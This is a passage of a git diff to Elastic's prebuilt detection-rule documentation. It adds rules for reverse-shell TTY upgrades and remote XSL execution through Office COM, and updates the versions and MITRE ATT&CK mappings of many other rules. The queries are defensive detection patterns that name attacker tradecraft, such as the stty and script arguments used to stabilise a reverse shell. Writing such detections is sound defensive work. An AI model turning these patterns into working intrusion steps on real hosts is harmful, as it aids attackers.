@@ -0,0 +1,69 @@ +[[potential-upgrade-of-non-interactive-shell]] +=== Potential Upgrade of Non-interactive Shell + +Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and ( + (process.name == "stty" and process.args == "raw" and process.args == "-echo" and process.args_count >= 3) or + (process.name == "script" and process.args in ("-qc", "-c") and process.args == "/dev/null" and + process.args_count == 4) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-windows-error-manager-masquerading.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-windows-error-manager-masquerading.asciidoc index 85d679df88..bd93808e36 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-windows-error-manager-masquerading.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-windows-error-manager-masquerading.asciidoc @@ -36,7 +36,7 @@ Identifies suspicious instances of the Windows Error Reporting process (WerFault * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -125,3 +125,7 @@ sequence by host.id, process.entity_id with maxspan = 5s ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-keylogging-script.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-keylogging-script.asciidoc index b49b90ffb2..d6dda5d8d2 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-keylogging-script.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-keylogging-script.asciidoc @@ -34,7 +34,7 @@ Detects the use of Win32 API Functions that can be used to capture user keystrok * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 109 +*Version*: 110 *Rule authors*: @@ -132,3 +132,7 @@ event.category:process and host.os.type:windows and ** Name: PowerShell ** ID: T1059.001 ** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-script-block-logging-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-script-block-logging-disabled.asciidoc index 5e4218e572..c3b823ade1 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-script-block-logging-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-script-block-logging-disabled.asciidoc @@ -36,7 +36,7 @@ Identifies attempts to disable PowerShell Script Block Logging via registry modi * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -119,3 +119,7 @@ registry where host.os.type == "windows" and event.type == "change" and ** Name: Disable Windows Event Logging ** ID: T1562.002 ** Reference URL: https://attack.mitre.org/techniques/T1562/002/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-script-with-password-policy-discovery-capabilities.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-script-with-password-policy-discovery-capabilities.asciidoc index 684382b712..d6546ead2d 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-script-with-password-policy-discovery-capabilities.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-script-with-password-policy-discovery-capabilities.asciidoc @@ -28,10 +28,11 @@ Identifies the use of Cmdlets and methods related to remote execution activities * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Execution * Data Source: PowerShell Logs * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: 
@@ -99,3 +100,15 @@ event.category: "process" and host.os.type:windows and ** Name: Password Policy Discovery ** ID: T1201 ** Reference URL: https://attack.mitre.org/techniques/T1201/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc index 3f72d35375..f64d6536bc 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc @@ -32,10 +32,11 @@ Identifies the use of Cmdlets and methods related to remote execution activities * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Execution * Data Source: PowerShell Logs * Rule Type: BBR -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -86,3 +87,15 @@ event.category:process and host.os.type:windows and ** Name: Windows Remote Management ** ID: T1021.006 ** Reference URL: https://attack.mitre.org/techniques/T1021/006/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-share-enumeration-script.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-share-enumeration-script.asciidoc index 7950c02561..20425ddb5b 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-share-enumeration-script.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-share-enumeration-script.asciidoc @@ -32,10 +32,12 @@ Detects scripts that contain PowerShell functions, structures, or Windows API fu * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Collection +* Tactic: Execution * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -129,3 +131,11 @@ event.category:process and host.os.type:windows and ** Name: Native API ** ID: T1106 ** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-discovery-related-windows-api-functions.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-discovery-related-windows-api-functions.asciidoc index 2d50ba7f68..d1de60cd0b 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-discovery-related-windows-api-functions.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-discovery-related-windows-api-functions.asciidoc @@ -31,10 +31,12 @@ This rule detects the use of discovery-related Windows API functions in PowerShe * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Collection +* Tactic: Execution * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 109 +*Version*: 110 *Rule authors*: 
@@ -165,3 +167,11 @@ event.category:process and host.os.type:windows and ** Name: Native API ** ID: T1106 ** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-script-with-audio-capture-capabilities.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-script-with-audio-capture-capabilities.asciidoc index f000ce607c..7c74e034a0 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-script-with-audio-capture-capabilities.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-script-with-audio-capture-capabilities.asciidoc @@ -33,7 +33,7 @@ Detects PowerShell scripts that can record audio, a common feature in popular po * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -127,3 +127,7 @@ event.category:process and host.os.type:windows and ** Name: PowerShell ** ID: T1059.001 ** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/process-injection-by-the-microsoft-build-engine.asciidoc b/docs/detections/prebuilt-rules/rule-details/process-injection-by-the-microsoft-build-engine.asciidoc index 203974c199..2cf76bd7e4 100644 --- a/docs/detections/prebuilt-rules/rule-details/process-injection-by-the-microsoft-build-engine.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/process-injection-by-the-microsoft-build-engine.asciidoc 
@@ -28,9 +28,10 @@ An instance of MSBuild, the Microsoft Build Engine, created a thread in another * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Privilege Escalation * Data Source: Sysmon Only -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -58,6 +59,14 @@ process.name:MSBuild.exe and host.os.type:windows and event.action:"CreateRemote ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ * Tactic: ** Name: Privilege Escalation ** ID: TA0004 diff --git a/docs/detections/prebuilt-rules/rule-details/process-started-from-process-id-pid-file.asciidoc b/docs/detections/prebuilt-rules/rule-details/process-started-from-process-id-pid-file.asciidoc index ea0823b4d2..e2f1cb1df2 100644 --- a/docs/detections/prebuilt-rules/rule-details/process-started-from-process-id-pid-file.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/process-started-from-process-id-pid-file.asciidoc @@ -37,7 +37,7 @@ Identifies a new process starting from a process ID (PID), lock or reboot file w * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -58,6 +58,8 @@ Detection alerts from this rule indicate a process spawned from an executable ma - Examine parent and child process relationships of the new process to determine if other processes are running. - Examine the /var/run directory using Osquery to determine other potential PID files with unsually large file sizes, indicative of it being an executable: "SELECT f.size, f.uid, f.type, f.path from file f WHERE path like '/var/run/%%';" - Examine the reputation of the SHA256 hash from the PID file in a database like VirusTotal to identify additional pivots and artifacts for investigation. + + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/process-termination-followed-by-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/process-termination-followed-by-deletion.asciidoc index 10b7cbe10e..b65b3a198c 100644 --- a/docs/detections/prebuilt-rules/rule-details/process-termination-followed-by-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/process-termination-followed-by-deletion.asciidoc @@ -32,7 +32,7 @@ Identifies a process termination event quickly followed by the deletion of its e * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -124,6 +124,14 @@ sequence by host.id with maxspan=5s ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Technique: ** Name: Indicator Removal ** ID: T1070 ** Reference URL: https://attack.mitre.org/techniques/T1070/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/psexec-network-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/psexec-network-connection.asciidoc index a7103f100f..41d92290cf 100644 --- a/docs/detections/prebuilt-rules/rule-details/psexec-network-connection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/psexec-network-connection.asciidoc @@ -29,10 +29,11 @@ Identifies use of the SysInternals tool PsExec.exe making a network connection. * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Lateral Movement * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -119,3 +120,15 @@ sequence by process.entity_id ** Name: Lateral Movement ** ID: TA0008 ** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/rule-details/rare-aws-error-code.asciidoc b/docs/detections/prebuilt-rules/rule-details/rare-aws-error-code.asciidoc index e2c11b9c5d..967e0e6785 100644 --- a/docs/detections/prebuilt-rules/rule-details/rare-aws-error-code.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/rare-aws-error-code.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected an unusual error in a CloudTrail message. These * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/rdp-enabled-via-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/rdp-enabled-via-registry.asciidoc index b5d7c31931..db84424902 100644 
--- a/docs/detections/prebuilt-rules/rule-details/rdp-enabled-via-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/rdp-enabled-via-registry.asciidoc @@ -30,11 +30,12 @@ Identifies registry write modifications to enable Remote Desktop Protocol (RDP) * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -117,3 +118,11 @@ registry where host.os.type == "windows" and ** Name: Remote Desktop Protocol ** ID: T1021.001 ** Reference URL: https://attack.mitre.org/techniques/T1021/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appcert-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appcert-dll.asciidoc index 37e3302372..9165dc53f3 100644 --- a/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appcert-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appcert-dll.asciidoc @@ -30,10 +30,11 @@ Detects attempts to maintain persistence by creating registry keys using AppCert * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: 
@@ -78,3 +79,15 @@ registry where host.os.type == "windows" and ** Name: AppCert DLLs ** ID: T1546.009 ** Reference URL: https://attack.mitre.org/techniques/T1546/009/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: AppCert DLLs +** ID: T1546.009 +** Reference URL: https://attack.mitre.org/techniques/T1546/009/ diff --git a/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appinit-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appinit-dll.asciidoc index c60b28595f..22378cafcd 100644 --- a/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appinit-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appinit-dll.asciidoc @@ -30,11 +30,12 @@ AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every proces * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -135,3 +136,11 @@ registry where host.os.type == "windows" and ** Name: AppInit DLLs ** ID: T1546.010 ** Reference URL: https://attack.mitre.org/techniques/T1546/010/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/remote-execution-via-file-shares.asciidoc b/docs/detections/prebuilt-rules/rule-details/remote-execution-via-file-shares.asciidoc index 26032562ee..d47eab30b8 100644 
--- a/docs/detections/prebuilt-rules/rule-details/remote-execution-via-file-shares.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/remote-execution-via-file-shares.asciidoc @@ -8,9 +8,6 @@ Identifies the execution of a file that was created by the virtual system proces *Rule indices*: * logs-endpoint.events.* -* winlogbeat-* -* logs-windows.* -* endgame-* *Severity*: medium @@ -36,7 +33,7 @@ Identifies the execution of a file that was created by the virtual system proces * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -106,7 +103,8 @@ Adversaries can use network shares to host tooling to support the compromise of [source, js] ---------------------------------- sequence with maxspan=1m - [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and file.extension : "exe"] by host.id, file.path + [file where host.os.type == "windows" and event.type in ("creation", "change") and + process.pid == 4 and (file.extension : "exe" or file.Ext.header_bytes : "4d5a*")] by host.id, file.path [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-script-interpreter.asciidoc index 9d8f1efed3..b906c4992e 100644 --- a/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-script-interpreter.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-script-interpreter.asciidoc 
@@ -29,10 +29,11 @@ Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) bei * OS: Windows * Use Case: Threat Detection * Tactic: Command and Control +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -121,3 +122,15 @@ sequence by host.id, process.entity_id ** Name: Ingress Tool Transfer ** ID: T1105 ** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/remote-xsl-script-execution-via-com.asciidoc b/docs/detections/prebuilt-rules/rule-details/remote-xsl-script-execution-via-com.asciidoc new file mode 100644 index 0000000000..faafe4c463 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/remote-xsl-script-execution-via-com.asciidoc 
@@ -0,0 +1,84 @@ +[[remote-xsl-script-execution-via-com]] +=== Remote XSL Script Execution via COM + +Identifies the execution of a hosted XSL script using the Microsoft.XMLDOM COM interface via Microsoft Office processes. This behavior may indicate adversarial activity to execute malicious JScript or VBScript on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [library where host.os.type == "windows" and dll.name : "msxml3.dll" and + process.name : ("winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe")] by process.entity_id + [process where host.os.type == "windows" and event.action == "start" and + process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe") and + not process.executable : + ("?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\SysWoW64\\WerFault.exe", + "?:\\windows\\splwow64.exe", + "?:\\Windows\\System32\\conhost.exe", + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*exe")] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** 
Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: XSL Script Processing +** ID: T1220 +** Reference URL: https://attack.mitre.org/techniques/T1220/ diff --git a/docs/detections/prebuilt-rules/rule-details/scheduled-task-created-by-a-windows-script.asciidoc b/docs/detections/prebuilt-rules/rule-details/scheduled-task-created-by-a-windows-script.asciidoc index 1973b7ca8c..1cfde4618e 100644 --- a/docs/detections/prebuilt-rules/rule-details/scheduled-task-created-by-a-windows-script.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/scheduled-task-created-by-a-windows-script.asciidoc @@ -30,10 +30,11 @@ A scheduled task was created by a Windows script via cscript.exe, wscript.exe or * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -82,3 +83,19 @@ sequence by host.id with maxspan = 30s ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/scheduled-task-execution-at-scale-via-gpo.asciidoc b/docs/detections/prebuilt-rules/rule-details/scheduled-task-execution-at-scale-via-gpo.asciidoc index 6adaa08cab..12ec1650cb 100644 
--- a/docs/detections/prebuilt-rules/rule-details/scheduled-task-execution-at-scale-via-gpo.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/scheduled-task-execution-at-scale-via-gpo.asciidoc @@ -35,11 +35,12 @@ Detects the modification of Group Policy Object attributes to execute a schedule * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Lateral Movement * Data Source: Active Directory * Resources: Investigation Guide * Use Case: Active Directory Monitoring -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -120,3 +121,11 @@ or ** Name: Group Policy Modification ** ID: T1484.001 ** Reference URL: https://attack.mitre.org/techniques/T1484/001/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/rule-details/scheduled-tasks-at-command-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/scheduled-tasks-at-command-enabled.asciidoc index 9d63935fec..760f9c1d87 100644 --- a/docs/detections/prebuilt-rules/rule-details/scheduled-tasks-at-command-enabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/scheduled-tasks-at-command-enabled.asciidoc @@ -32,10 +32,11 @@ Identifies attempts to enable the Windows scheduled tasks AT command via the reg * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: 
@@ -79,3 +80,15 @@ registry where host.os.type == "windows" and ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: At +** ID: T1053.002 +** Reference URL: https://attack.mitre.org/techniques/T1053/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/security-software-discovery-using-wmic.asciidoc b/docs/detections/prebuilt-rules/rule-details/security-software-discovery-using-wmic.asciidoc index c373a68fef..4c7427228d 100644 --- a/docs/detections/prebuilt-rules/rule-details/security-software-discovery-using-wmic.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/security-software-discovery-using-wmic.asciidoc @@ -35,7 +35,7 @@ Identifies the use of Windows Management Instrumentation Command (WMIC) to disco * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -103,3 +103,11 @@ process.args : "/namespace:\\\\root\\SecurityCenter2" and process.args : "Get" ** Name: Security Software Discovery ** ID: T1518.001 ** Reference URL: https://attack.mitre.org/techniques/T1518/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/security-software-discovery-via-grep.asciidoc b/docs/detections/prebuilt-rules/rule-details/security-software-discovery-via-grep.asciidoc index ea0896e047..f369da689d 100644 --- a/docs/detections/prebuilt-rules/rule-details/security-software-discovery-via-grep.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/security-software-discovery-via-grep.asciidoc @@ -32,7 +32,7 @@ Identifies the use of the grep command to discover known third-party macOS and L * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -116,7 +116,16 @@ process.name : "grep" and user.id != "0" and "osquery*", "elastic-endpoint*" ) and - not (process.args : "Avast" and process.args : "Passwords") + not ( + (process.args : "Avast" and process.args : "Passwords") or + (process.parent.args : "/opt/McAfee/agent/scripts/ma" and process.parent.args : "checkhealth") or + (process.command_line : ( + "grep ESET Command-line scanner, version %s -A2", + "grep -i McAfee Web Gateway Core version:", + "grep --color=auto ESET Command-line scanner, version %s -A2" + ) + ) + ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc b/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc index 3ee71cc0f0..b8773ee3dc 100644 --- a/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc @@ -3,7 +3,7 @@ Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -35,7 +35,7 @@ Identifies the use of a compression utility to collect known files containing se * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc index 1976b3f02b..3d843ae277 100644 
